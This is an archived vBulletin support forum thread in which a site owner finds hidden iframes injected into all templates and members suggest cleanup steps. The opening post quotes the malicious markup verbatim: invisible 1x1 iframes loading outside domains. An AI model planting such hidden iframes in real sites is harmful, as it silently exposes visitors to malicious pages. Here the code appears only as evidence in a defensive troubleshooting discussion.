Go Back   vb.org Archive > vBulletin 4 Discussion > vB4 General Discussions
Reload this Page iframe injected into all templates
FAQ Community Calendar Today's Posts Search

Reply
Page 1 of 4 1 23 Last »
 
Thread Tools Display Modes
  #1  
Old 09-04-2013, 09:35 PM
dawges dawges is offline
 
Join Date: May 2007
Posts: 96
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default iframe injected into all templates
I have searched Google and have found a couple of forums suffering the same fate.

Today all of a sudden I noticed my pages loading slow so i looked at the code. I see a iframe at the bottom of all my pages:

Code:
<iframe src="http://damnxd.org/dns.html" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://www.jobless-jack.com/" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
My question is, how did it get there and how do i get rid of it?

--------------- Added [DATE]1378334265[/DATE] at [TIME]1378334265[/TIME] ---------------

I am running version 4.2.0 by the way.
Reply With Quote
  #2  
Old 09-04-2013, 09:47 PM
ozzy47's Avatar
ozzy47 ozzy47 is offline
 
Join Date: Jul 2009
Location: USA
Posts: 10,929
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
You may want to check your templates and see if you were hacked and someone added it into your templates.
Reply With Quote
  #3  
Old 09-04-2013, 09:58 PM
dawges dawges is offline
 
Join Date: May 2007
Posts: 96
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Quote:
Originally Posted by ozzy47 View Post
You may want to check your templates and see if you were hacked and someone added it into your templates.
I checked the footer template but i dont know what to look for. I dont see the code just jump out.
Reply With Quote
  #4  
Old 09-04-2013, 10:00 PM
ozzy47's Avatar
ozzy47 ozzy47 is offline
 
Join Date: Jul 2009
Location: USA
Posts: 10,929
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Ok next step is to disable all plugins to see if it is coming from there.

Open your config.php and below<?php add this line:

PHP Code:
 define('DISABLE_HOOKS'true); 
So it looks like this:
PHP Code:
<?php
define('DISABLE_HOOKS'true);
/*=================================================  =====================*\
|| ##################################################  ################## ||
|| # vBulletin 4.1.4
Then check the page again and see if the iframe is still there.
Reply With Quote
  #5  
Old 09-04-2013, 10:19 PM
TheLastSuperman's Avatar
TheLastSuperman TheLastSuperman is offline
Senior Member
  
Join Date: Sep 2008
Location: North Carolina
Posts: 5,844
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
If you have vBSEO installed this is very likely, could also be from the recently discovered install directory exploit we are unsure without actually investigating it ourselves.

Try running the queries listed on my blog post scroll down to find "Run the following Queries in phpMyAdmin" and do so - http://www.vbulletin.com/forum/blogs...vbulletin-site

Some basics:
  1. Start off by replacing all files with 100% fresh vbulletin files of the exact same version.
  2. Next run queries listed on the blog and investigate all that come up. If your not running a custom style then first delete any malicious plugins/templates and you can delete the default style and remake a new one (create a new style after removing the malicious plugins etc then delete the old one otherwise your primary is the default and it will not allow you to delete etc).
  3. Next check filesystem - AdminCP > Maintenance > Diagnostics > Suspect File Versions and check to see what is listed, cross reference that via FTP and inspect file dates etc; Anything named odd should be investigated i.e. sexy.php, lol.php anything seemingly odd however not all hackers are so apparent they could have named it crontools.php or something you would if not 100% familiar with the product assume was a normal file so take your time checking.
  4. Once you feel its clean, either create or login your Google webmaster tools and request the site be checked, once they verify its clean you're normally good to go.
Reply With Quote
Благодарность от:
ozzy47
  #6  
Old 09-04-2013, 10:22 PM
ozzy47's Avatar
ozzy47 ozzy47 is offline
 
Join Date: Jul 2009
Location: USA
Posts: 10,929
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Thanks Mike, I knew I seen that somewhere before, I just could not for the life of me remember where it was.
Reply With Quote
  #7  
Old 09-04-2013, 10:27 PM
dawges dawges is offline
 
Join Date: May 2007
Posts: 96
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Disabling Hooks does nothing, the iframe stays.

Superman I do not have vBSEO installed, However i will read the post you provided and report back.
Reply With Quote
  #8  
Old 09-04-2013, 10:27 PM
TheLastSuperman's Avatar
TheLastSuperman TheLastSuperman is offline
Senior Member
  
Join Date: Sep 2008
Location: North Carolina
Posts: 5,844
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Quote:
Originally Posted by ozzy47 View Post
Thanks Mike, I knew I seen that somewhere before, I just could not for the life of me remember where it was.
lol tis now bookmarked, I've been visiting profile on vb.com them finding all blog posts lololol .
Reply With Quote
  #9  
Old 09-04-2013, 10:29 PM
ozzy47's Avatar
ozzy47 ozzy47 is offline
 
Join Date: Jul 2009
Location: USA
Posts: 10,929
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Hmmm then it may be in the files somewhere, if it is not in the templates or plugins. Let us know what you come up with after following the post.
Reply With Quote
  #10  
Old 09-04-2013, 10:29 PM
dawges dawges is offline
 
Join Date: May 2007
Posts: 96
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
I have 4 new administrator in my admin group. All hackers.
Reply With Quote
Reply
Page 1 of 4 1 23 Last »

« Previous Thread | Next Thread »

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


All times are GMT. The time now is 07:27 PM.

Contact Us - Archive - Top

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.04527 seconds
  • Memory Usage 2,263KB
  • Queries Executed 11 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (1)bbcode_code
  • (2)bbcode_php
  • (2)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (2)pagenav_pagelink
  • (10)post_thanks_box
  • (1)post_thanks_box_bit
  • (10)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (1)post_thanks_postbit
  • (10)post_thanks_postbit_info
  • (10)postbit
  • (10)postbit_onlinestatus
  • (10)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 
Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • fetch_musername
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • post_thanks_function_fetch_thanks_bit_start
  • post_thanks_function_show_thanks_date_start
  • post_thanks_function_show_thanks_date_end
  • post_thanks_function_fetch_thanks_bit_end
  • post_thanks_function_fetch_post_thanks_template_start
  • post_thanks_function_fetch_post_thanks_template_end
  • pagenav_page
  • pagenav_complete
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete